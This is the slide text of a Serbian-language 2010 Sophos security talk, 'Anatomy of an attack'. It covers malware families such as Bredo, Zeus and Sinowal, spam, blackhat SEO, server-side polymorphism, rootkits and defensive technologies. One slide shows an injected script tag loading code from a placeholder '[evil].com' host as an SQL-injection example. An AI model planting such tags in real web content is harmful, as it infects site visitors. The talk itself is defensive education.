Prezentacija "Anatomija napada – duhovi u mašini" koju je Vanja Švajcer održao na Sophos seminaru u maju 2010. godine.

1. Vanja Svajcer Principal Researcher – Sophos Beograd, 13 Maj 2010 Anatomijanapada – duhovi u mašini

2. Šta radi SophosLabs? Sakuplja pretnje Analizira i klasifikuje Kreira detekcije i otklanja pretnje Objavljuje sveže definicije i informacije Istraživanje i razvoj Nešto više informacija videćemo kasnije 2

3. SophosLabsu samom centru

4. Anatomija napada Postavljanje scenarija Zlonamerni softver (Malware) Tehnike napada Proces analize i alati Tehnologija zaštite 4

5. Tipovi malicioznog softvera Virus Trojanac Crv (Worm) 5

6. Nema „standardnog“ pisca virusa, nema „standardnog“ motiva za pisanje Školarci Srednjoškolci Studenti IT profesionalci Uglavnom muškarci Nikako A/V kompanije Ko se nekada bavio pisanjem virusa?

9. Virusi se retko viđaju, ali čini se da opet postaju popularni U pitanju je novac U osnovi se svodi na kriminal ( I dalje postoji tamo neki pegavi tinejdžer…) Ko piše malver danas?

10. APT Advanced Persistent Threat Moderan izraz za “targeted malware” Mala veličina (oko 100k) i posebne namene Nema pakovanja Izgleda kao legitiman Windows fajl Neovlašćeni prikriveni transfer podataka (Data Exfiltration) Težak za uklanjanje 10

11. 11 Email pretnje Druga polovina 2008. bila je svedok dramatičnog porasta malverau obliku priloga email-a 2009.taj trend se nastavlja,nekoliko familija se širi agresivnimmasovnim spemovanjem Iste stare taktike socijalnog inženjeringa UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets itd.

12. 12 Top spemovani malver (2009) Dominiraju ključne familijemalvera Bredo Waled Jednostavnoali i dalje radi!

13. Socijalni inženjering – Bredo Mal/Bredo Ista kampanja može obuhvatati brojne “različite” priloge

14. Socijalni inženjering – Zbot (aka Zeus) Mal/Zbot

15. BredovsZbot Konkurencija između botova!!! Bredopokušava da onemogući bilo koji instalirani Zbot Vrlo slično poput NetskyvsBaglerata od pre par godina!!!

16. 16 Email pretnje Globalnespem zamke za praćenje spema SADusmerava više spema nego bilo koja druga pojedinačna država Kompromitovani računari ne samo što šire spem već distribuiraju malver i lansiraju DDoS napade

17. Web najdominantniji 99% inficiranih sistema su legitimni kompromitovani sajtovi Sajtovi za napad Botnet C&C korišćenjem HTTP Napadi i dalje često počinju spemovanjem email-a 17

18. 18

19. Napadi Web 2.0 aplikacija

20. Korak1: preusmeravanje sa kompromitovanog sajta Kompromitovani web sajtovi Attacker-controlledredirects Attack site usingbundle of exploits Payload

21. Kompromitovanje hostova 21

22. SQL injection DB DB DB Malicious SQLinjection Hakeri koriste alate da identifikuju stranice potencijalno ranjive na SQL injection Šalju maliciozneHTTP zahteve (Demo)

23. SQL injection <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http://[evil].com/file.js SQL injection uzrokuje da baza podataka postane zabiberena malicioznim skript tagovima Kao rezultat, stranice na web serveru izgrađene od podataka preuzetih iz baze takođe sadrže maliciozne skript tagove

24. SQL injection Korisnik se kreće web sajtom Maliciozni skript tag prikrivenoučitava skript sa udaljenog servera Žrtva postaje inficirana malverom:Asproxtrojan

25. 25 Demo SQLi + XSS

26. Novootkrivene inficirane stranice – april 2010 26

27. Blackhat SEO Kompromitovani hostovi zasejani sa SEO-kitovima Povećavaju rangiranje stranice 27

28. SEO trovanje Pretraga po popularnim rečima

29. Blackhat SEO 29

30. Blackhat SEO 30

31. 31 Demo Blackhat SEO

32. Vidljivost – sajtovi koji hostuju SEO-kitove

33. Korak3: Preuzimanje sadržaja sa napadačevog sajta Kompromitovani web sajtovi Preusmeravanja kojakontroliše napadač Sajt za napad koristi više kombinovanih ranjivosti Payload

34. Web napadi Otkriven: 19. oktobra 2009. Izrađen korišćenjem kupljenih kompleta alata MPack, IcePack, GPack,Neosploit, Eleonore, Yes Konzola za upravljanje Phishing Najpogođenije države: Francuska – 4% SAD– 17% Velika Britanija – 3% Nemačka – 6%

35. Web napadi Pregled po programimaza pregled Internet sadržaja! Polimorfizam sa serverske strane Procenat pogođenih: MSIE – 12% FireFox – 1% Opera – 5%

36. Polimorfizam 36

37. Polimorfizam 37

38. Polimorfizam 38

39. Polimorfizam 39

40. Polimorfizam 40

41. Slabosti polimorfnog malvera Poly-engine je deo koda Može biti reverzovan od strane upornog istraživača Mora biti dekriptovan u memoriji Emulira programski kod dok se ne nađe prava varijanta Detekcija može biti bazirana po proceduri dekripcije 41

42. Polimorfizam sa serverske strane 42

43. Polimorfizam sa serverske strane 43

44. Polimorfizam sa serverske strane 44

45. Polimorfizam sa serverske strane 45

46. 46 Demo SSP

47. Korak4: Napadni žrtve kroz ranjivosti, zarazi ih Kompromitovani web sajtovi Preusmeravanja kojakontroliše napadač Sajt za napad koristiviše kombinovanih ranjivosti Tovar

48. Lažni AV profesionalizam

49. 49 Video - scareware

50. Troj/MacSwp 50 

51. Zeus (Zbot) Komplet za kreiranje botneta i malvera za krađu informacija Builder Loader Control panel 51

52. 52 Demo Zbot

53. Zeus (Zbot) - tracker 53

54. 54 Rootkitovi Programi koji koriste različite tehnike da sakriju svoje prisustvo na računaru Trojanci Legitimni programi?

55. Šta Rootkitovi rade? Listanjefajlova Memo.doc Memo.doc Sales.xls Sales.xls Phish.exe Sophos.ppt Listanjefajlova Anti-Virus skener Rootkit Operativni sistem Phish.exe Sophos.ppt

56. 56 Demo rootkit

57. 57 Vrhunski rootkitovi TDSS (TDL3) MS10-015 update

58. Vrhunski rootkitovi– Sinowal (Mebroot) InficiraMBR (poput starih boot sektor virusa) ModifikujeOS loader da učita maliciozni drajver Drajver sakriva maliciozniMBR (stealth) Instalira prilagođenimrežni stek Sadržibackdoor (enkriptovanaHTTP komunikacija) Tovar– ubrizgava maliciozne DLL-ove Pseudo-nasumično generisanje URL-ova zaupdate (dnevni)

59. Rootkitovi– Sinowal (Mebroot) CPU Real mode CPU Protected mode BIOS initialization MBR Boot loader Early kernel initialization Kernel initialization MBR Boot loader Early kernel initialization User process Endpoint security User process Sinowal dropper User process Read MBR BIOS services Window services Window services Hard disk

60. Sinowal geografsko širenje(Sinowal, Feb-Mar 2010)

61. 61 Vrhunski rootkitovi budućnosti Rootkitovi za virtualizaciju Softver(Subvirt) Uz pomoć hardvera (Bluepill, Vitriol) Bootkitovi (eEye, vBootkit, Stoned) SMM bazirani rootkitovi Bios/EFI bazirani rootkitovi?

62. Rootkitovi za virtualizaciju Aplikacija 1 OSg1 OSg2 Aplikacija 2 VMM Rootkit za virtualizaciju OS Hardver

63. Rootkitovi za virtualizaciju OSg3 OSg2 OSg1 Domen 0 Hardver Rootkit za virtualizaciju – maliciozni hipervizor

64. SophosLabs™

65. Pregled 65 50000

66. SophosLabssistemi

67. 67 Demo lab sistemi

68. Tehnologija zaštite Inspekcija sadržaja (klasično skeniranje) Detekcija na bazi ponašanja (HIPS) Reputacija Domen Fajl 68

69. Životni ciklus familije malvera Prvi član porodice Analiza Detekcija TEST Objava Sledeći član porodica

70. Karakteristike familije Identične osnovne funkcionalnosti Nove varijante mogu imati dodatne funkcionalnosti Linije koda se ponovo upotrebljavaju Nakon rekompilacije, nova varijanta je binarno različita Tradicionalno skeniranje nije efikasno za proaktivnu detekciju familije Zahteva analizu na funkcionalnom nivou

71. Grafički prikaz aplikativnih zahteva

72. Spakovan -> Raspakovan

73. „Runtime behavioral“zaštita Nadopunjuje Behavioral Genotype Proverava ponašanje procesa primenjenona sistemu Proverava sve pokrenute procese na znake malicioznih modifikacija sistemskih objekata Fajlove Registry unose Procese Mrežne konekcije Učitane drajvere

75. Hmmm, OK.Skeniram na viruse…

76. Ništa nije pronađeno.

77. Virus.exe otvararegistry run ključ...

78. Zanimljivo. Reci mi nešto više o tome.

79. Virus.exe se registruje u run ključ…

80. Hmmm, ne, to nije OK.Blokiraj operaciju!!!

81. Operacija blokirana.

82. Hvala ti kernele!

83. Izveštavam o ponašanju.Uprošćena runtime arhitektura Privileged – kernel mode Non-privileged – user mode Virus.exe

84. Buffer overflow zaštita Generičkatehnologijaza detekciju zloupotrebe propusta (uključujući tzv. zero day zloupotrebe) Nadopunjuje Windows DEP Detektuje različite buffer overflow napade Stack Heap Return to lib C Štiti Microsoft i ne-Microsoft procese, uglavnom sa klijentske strane

86. Zanimljivo, odakle dolaziš?

87. Internet Explorer programski kod.

88. OK.

89. Preuzimam fajl2...

90. Oh, ne opet.Odakle dolaziš?

91. Stack.

92. Oh, ne. Buffer overflow detektovan!!!

93. Suspendujem proces.

94. Prijavljujem ponašanje.Iexplore.exe

95. Cloud computing 77

96. Cloud zaštita Pretrage u realnom vremenu Povratne informacije u realnom vremenu (zaštita zajednice) Socijalno umrežavanje vezano za bezbednost Premošćavanje prekida u zaštiti Unapređenje vremena odziva 78

97. Proaktivno vs reaktivno 79

98. Zaključak Malver postaje sve kompleksniji Finansijska motivacija Usmereni (targeted) malver može predstavljati izazov Security zajednica ne gubi bitku Stalno se razvijaju nove metode Tehnologija ne predstavlja „srebrni metak“ 80

99. vanja.svajcer@sophos.com Blog: http://www.sophos.com/blogs/sophoslabs Twitter: http://twitter.com/sophoslabs Pitanja?